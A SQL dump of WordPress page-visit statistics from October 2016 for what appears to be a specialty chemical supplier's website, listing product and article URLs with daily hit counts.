INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-24', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-24', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-24', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-24', 1, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-24', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-24', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/', '2016-10-24', 1, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epon-resin-826/', '2016-10-24', 1, 1463); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-24', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/heloxy-48/', '2016-10-24', 1, 1222); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-24', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/', '2016-10-24', 1, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-molding-issues/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-24', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-25', 463, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-25', 123, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-25', 80, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-25', 29, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-25', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-25', 55, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-25', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-25', 21, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-25', 7, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-25', 53, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-25', 30, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-25', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-25', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-25', 11, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-25', 16, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-25', 10, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-25', 21, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-25', 7, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-25', 16, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-25', 6, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pro/', '2016-10-25', 6, 1435); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pro/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 1435); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-25', 13, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-25', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-25', 4, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-25', 3, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-25', 12, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/', '2016-10-25', 2, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-25', 12, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-25', 15, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-10-25', 6, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-25', 5, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-25', 4, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 3, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 3, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-25', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-25', 3, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-25', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-25', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-25', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-25', 7, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-25', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1004f/', '2016-10-25', 1, 939); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1004f/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 939); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-25', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/attachment/3290/', '2016-10-25', 1, 1201); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/attachment/3290/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1201); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-25', 4, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-25', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-25', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-25', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-25', 2, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-25', 13, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-25', 11, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5003-w-55/', '2016-10-25', 3, 1033); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5003-w-55/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 1033); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-25', 3, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-25', 3, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-25', 3, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-25', 4, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-25', 5, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-25', 3, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-25', 3, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-25', 3, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-25', 3, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-25', 3, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-25', 3, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-25', 3, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-25', 3, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-25', 4, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-25', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-25', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-molding-issues/', '2016-10-25', 7, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-25', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-25', 3, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-25', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-25', 4, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-25', 3, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-25', 3, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-25', 2, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-25', 3, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-25', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-25', 12, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-25', 4, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-25', 3, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-25', 2, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-25', 2, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-25', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-25', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-25', 2, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-25', 7, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-25', 3, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-25', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-25', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-25', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-25', 3, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-25', 3, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-25', 2, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-25', 5, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-25', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-211x/', '2016-10-25', 1, 1637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-25', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-25', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-25', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-10-25', 2, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-25', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-25', 2, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon/', '2016-10-25', 1, 490); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-25', 5, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-25', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-25', 2, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-25', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-25', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-25', 6, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-25', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-25', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-25', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-25', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-25', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-25', 2, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-25', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-25', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-25', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-25', 1, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-25', 6, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-25', 2, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-25', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-25', 1, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-25', 5, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-25', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/?remove_from_wishlist_after_add_to_cart=302', '2016-10-25', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?remove_from_wishlist_after_add_to_cart=1677', '2016-10-25', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-25', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-25', 2, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-25', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-10-25', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-25', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-25', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-25', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-25', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/', '2016-10-25', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-25', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-25', 4, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-25', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-25', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-872/', '2016-10-25', 1, 900); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-872/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 900); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-25', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-25', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-25', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-25', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/', '2016-10-25', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-25', 3, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-25', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-25', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-25', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?add_to_wishlist=1292', '2016-10-25', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-25', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-25', 1, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-25', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-25', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-26', 14, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-26', 5, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-26', 436, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-26', 155, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-26', 10, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-molding-issues/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-26', 4, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-26', 64, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-26', 19, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-26', 5, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-26', 4, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-26', 11, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-26', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-26', 68, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-26', 11, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-26', 17, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-26', 59, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-26', 14, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-26', 39, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-26', 8, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-26', 8, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-molding-issues/', '2016-10-26', 8, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-26', 5, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-26', 2, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-26', 2, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-26', 3, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-26', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-26', 2, 2442); 
